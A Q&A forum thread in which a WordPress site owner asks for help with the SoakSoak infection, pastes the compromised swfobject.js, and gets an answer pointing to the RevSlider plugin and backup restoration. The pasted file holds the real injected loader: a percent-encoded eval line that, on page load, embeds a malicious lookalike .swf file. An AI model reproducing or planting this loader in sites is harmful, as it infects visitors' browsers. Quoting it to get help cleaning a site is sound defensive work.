# Exploit SoakSoak injected in Wordpress

Tags: web-application, malware, exploit, javascript, wordpress

I have recently received an attack to my website and Google is warning visitors to not load the page. 
The malware is located in wp-includes/js/swfobject.js of my Wordpress and I had deleted it but appeared again.

Malware code:

```
/*  SWFObject v2.2 <http://code.google.com/p/swfobject/> 
    is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> 
*/
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y<X;Y++){U[Y]()}}function K(X){if(J){X()}else{U[U.length]=X}}function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load",Y,false)}else{if(typeof j.addEventListener!=D){j.addEventListener("load",Y,false)}else{if(typeof O.attachEvent!=D){i(O,"onload",Y)}else{if(typeof O.onload=="function"){var X=O.onload;O.onload=function(){X();Y()}}else{O.onload=Y}}}}}function h(){if(T){V()}else{H()}}function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setAttribute("type",q);var Z=X.appendChild(aa);if(Z){var Y=0;(function(){if(typeof Z.GetVariable!=D){var ab=Z.GetVariable("$version");if(ab){ab=ab.split(" ")[1].split(",");M.pv=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}else{if(Y<10){Y++;setTimeout(arguments.callee,10);return}}X.removeChild(aa);Z=null;H()})()}else{H()}}function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[af].id;var ab=o[af].callbackFn;var aa={success:false,id:Y};if(M.pv[0]>0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad<ac;ad++){if(X[ad].getAttribute("name").toLowerCase()!="movie"){ah[X[ad].getAttribute("name")]=X[ad].getAttribute("value")}}P(ai,ah,Y,ab)}else{p(ae);if(ab){ab(aa)}}}}}else{w(Y,true);if(ab){var Z=z(Y);if(Z&&typeof Z.SetVariable!=D){aa.success=true;aa.ref=Z}ab(aa)}}}}}function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typeof Y.SetVariable!=D){X=Y}else{var Z=Y.getElementsByTagName(r)[0];if(Z){X=Z}}}return X}function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X);if(ae){if(ae.nodeName=="OBJECT"){l=g(ae);Q=null}else{l=ae;Q=X}aa.id=R;if(typeof aa.width==D||(!/%$/.test(aa.width)&&parseInt(aa.width,10)<310)){aa.width="310"}if(typeof aa.height==D||(!/%$/.test(aa.height)&&parseInt(aa.height,10)<137)){aa.height="137"}j.title=j.title.slice(0,47)+" - Flash Player Installation";var ad=M.ie&&M.win?"ActiveX":"PlugIn",ac="MMredirectURL="+encodeURI(O.location).toString().replace(/&/g,"%26")+"&MMplayerType="+ad+"&MMdoctitle="+j.title;if(typeof ab.flashvars!=D){ab.flashvars+="&"+ac}else{ab.flashvars=ac}if(M.ie&&M.win&&ae.readyState!=4){var Y=C("div");X+="SWFObjectNew";Y.setAttribute("id",X);ae.parentNode.insertBefore(Y,ae);ae.style.display="none";(function(){if(ae.readyState==4){ae.parentNode.removeChild(ae)}else{setTimeout(arguments.callee,10)}})()}u(aa,ab,X)}}function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNode.insertBefore(X,Y);X.parentNode.replaceChild(g(Y),X);Y.style.display="none";(function(){if(Y.readyState==4){Y.parentNode.removeChild(Y)}else{setTimeout(arguments.callee,10)}})()}else{Y.parentNode.replaceChild(g(Y),Y)}}function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML}else{var Y=ab.getElementsByTagName(r)[0];if(Y){var ad=Y.childNodes;if(ad){var X=ad.length;for(var Z=0;Z<X;Z++){if(!(ad[Z].nodeType==1&&ad[Z].nodeName=="PARAM")&&!(ad[Z].nodeType==8)){aa.appendChild(ad[Z].cloneNode(true))}}}}}return aa}function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(typeof ai.id==D){ai.id=Y}if(M.ie&&M.win){var ah="";for(var ae in ai){if(ai[ae]!=Object.prototype[ae]){if(ae.toLowerCase()=="data"){ag.movie=ai[ae]}else{if(ae.toLowerCase()=="styleclass"){ah+=' class="'+ai[ae]+'"'}else{if(ae.toLowerCase()!="classid"){ah+=" "+ae+'="'+ai[ae]+'"'}}}}}var af="";for(var ad in ag){if(ag[ad]!=Object.prototype[ad]){af+='<param name="'+ad+'" value="'+ag[ad]+'" />'}}aa.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+ah+">"+af+"</object>";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab<ac;ab++){I[ab][0].detachEvent(I[ab][1],I[ab][2])}var Z=N.length;for(var aa=0;aa<Z;aa++){y(N[aa])}for(var Y in M){M[Y]=null}M=null;for(var X in swfobject){swfobject[X]=null}swfobject=null})}}();return{registerObject:function(ab,X,aa,Z){if(M.w3&&ab&&X){var Y={};Y.id=ab;Y.swfVersion=X;Y.expressInstall=aa;Y.callbackFn=Z;o[o.length]=Y;w(ab,false)}else{if(Z){Z({success:false,id:ab})}}},getObjectById:function(X){if(M.w3){return z(X)}},embedSWF:function(ab,ah,ae,ag,Y,aa,Z,ad,af,ac){var X={success:false,id:ah};if(M.w3&&!(M.wk&&M.wk<312)&&ab&&ah&&ae&&ag&&Y){w(ah,false);K(function(){ae+="";ag+="";var aj={};if(af&&typeof af===r){for(var al in af){aj[al]=af[al]}}aj.data=ab;aj.width=ae;aj.height=ag;var am={};if(ad&&typeof ad===r){for(var ak in ad){am[ak]=ad[ak]}}if(Z&&typeof Z===r){for(var ai in Z){if(typeof am.flashvars!=D){am.flashvars+="&"+ai+"="+Z[ai]}else{am.flashvars=ai+"="+Z[ai]}}}if(F(Y)){var an=u(aj,am,ah);if(aj.id==ah){w(ah,true)}X.success=true;X.ref=an}else{if(aa&&A()){aj.data=aa;P(aj,am,ah,ac);return}else{w(ah,true)}}if(ac){ac(X)}})}else{if(ac){ac(X)}}},switchOffAutoHideShow:function(){m=false},ua:M,getFlashPlayerVersion:function(){return{major:M.pv[0],minor:M.pv[1],release:M.pv[2]}},hasFlashPlayerVersion:F,createSWF:function(Z,Y,X){if(M.w3){return u(Z,Y,X)}else{return undefined}},showExpressInstall:function(Z,aa,X,Y){if(M.w3&&A()){P(Z,aa,X,Y)}},removeSWF:function(X){if(M.w3){y(X)}},createCSS:function(aa,Z,Y,X){if(M.w3){v(aa,Z,Y,X)}},addDomLoadEvent:K,addLoadEvent:s,getQueryParamValue:function(aa){var Z=j.location.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X++){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}();

eval(decodeURIComponent('%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%0A%09%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%09%7B%0D%0A%09%09%76%61%72%20%6F%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%6F%62%6A%65%63%74%27%29%3B%0D%0A%09%09%0D%0A%09%09%6F%2E%64%61%74%61%20%20%20%3D%20%27%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66%27%3B%0D%0A%09%09%6F%2E%77%69%64%74%68%20%20%3D%20%27%31%36%27%3B%0D%0A%09%09%6F%2E%68%65%69%67%68%74%20%3D%20%27%31%36%27%3B%0D%0A%09%09%6F%2E%63%6C%61%73%73%69%64%3D%20%27%63%6C%73%69%64%3A%44%32%37%43%44%42%36%45%2D%41%45%36%44%2D%31%31%63%66%2D%39%36%42%38%2D%34%34%34%35%35%33%35%34%30%30%30%30%27%3B%0D%0A%09%09%0D%0A%09%09%76%61%72%20%70%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%70%61%72%61%6D%27%29%3B%0D%0A%09%09%70%2E%6E%61%6D%65%20%20%3D%20%27%6D%6F%76%69%65%27%3B%0D%0A%09%09%70%2E%76%61%6C%75%65%20%3D%20%27%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66%27%3B%0D%0A%09%09%0D%0A%09%09%76%61%72%20%6F%32%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%6F%62%6A%65%63%74%27%29%3B%0D%0A%09%09%6F%32%2E%74%79%70%65%20%20%20%3D%20%27%61%70%70%6C%69%63%61%74%69%6F%6E%2F%78%2D%73%68%6F%63%6B%77%61%76%65%2D%66%6C%61%73%68%27%3B%0D%0A%09%09%6F%32%2E%64%61%74%61%20%20%20%3D%20%27%2F%77%70%2D%69%6E%63%6C%75%64%65%73%2F%6A%73%2F%73%77%66%6F%62%6A%63%74%2E%73%77%66%27%3B%0D%0A%09%09%6F%32%2E%77%69%64%74%68%20%20%3D%20%27%31%36%27%3B%0D%0A%09%09%6F%32%2E%68%65%69%67%68%74%20%3D%20%27%31%36%27%3B%0D%0A%09%09%0D%0A%09%09%6F%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%70%29%3B%0D%0A%09%09%6F%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6F%32%29%3B%0D%0A%09%0D%0A%09%09%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6F%29%3B%0D%0A%09%7D%0D%0A%09%0D%0A%7D%0D%0A%29%28%29%0D%0A%0D%0A'));
```

What should I do to solve this problem?

Edit:

Latest news

[image]

Comment: http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html http://www.adslzone.net/2014/12/15/tienes-blog-wordpress-comprueba-si-te-ha-afectado-el-malware-soaksoak/ It seems to be a recently massive attack because every news about this problem have the day of today

Comment: Kindly, visit the given link to know how to fix this issue: http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

Answer (score 2, accepted):

From what it sounds like this is not a problem limited to you. Many other WordPress websites have been hit. I'd expect someone to come out with a more comprehensive solution soon. That being said:

ARS Technica [just reported](http://arstechnica.com/security/2014/12/some-100000-or-more-wordpress-sites-infected-by-mysterious-malware/) that it seems like a premium plugin called RevSlider is responsible for the security hole.

Other than restoring the website from a backup and removing the plugin I haven't seen any great ideas on how to deal with the attack. Especially because it sounds like some themes come with the plugin installed from the start.

I'll edit my answer as more information comes to light.